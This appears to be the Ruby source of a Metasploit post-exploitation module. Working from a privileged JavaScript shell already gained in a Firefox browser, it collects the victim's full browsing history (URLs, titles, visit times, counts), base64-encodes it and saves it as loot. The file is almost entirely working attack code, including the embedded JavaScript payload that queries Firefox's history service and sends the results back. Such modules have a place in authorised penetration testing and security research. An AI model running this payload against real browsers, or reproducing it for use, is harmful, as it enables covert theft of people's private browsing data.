## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'json' require 'msf/core' class Metasploit3 < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox Gather History from Privileged Javascript Shell', 'Description' => %q{ This module allows collection of the entire browser history from a Firefox Privileged Javascript Shell. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' ], 'DisclosureDate' => 'Apr 11 2014' )) register_options([ OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90]) ], self.class) end def run results = js_exec(js_payload) if results.present? begin history = JSON.parse(results) history.each do |entry| entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } end file = store_loot("firefox.history.json", "text/json", rhost, history.to_json) print_good("Saved #{history.length} history entries to #{file}") rescue JSON::ParserError => e print_warning(results) end end end def js_payload %Q| (function(send){ try { var service = Components .classes["@mozilla.org/browser/nav-history-service;1"] .getService(Components.interfaces.nsINavHistoryService); var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa; var query = service.getNewQuery(); var options = service.getNewQueryOptions(); var result = service.executeQuery(query, options); var fields = []; var entries = []; var root = result.root; root.containerOpen = true; for (var i = 0; i < result.root.childCount; ++i) { var child = result.root.getChild(i); if (child.type == child.RESULT_TYPE_URI) { entries.push({ uri: b64(child.uri), title: b64(child.title), time: b64(child.time), accessCount: b64(child.accessCount) }); } } result.root.containerOpen = false; send(JSON.stringify(entries)); } catch (e) { send(e); } })(send); |.strip end end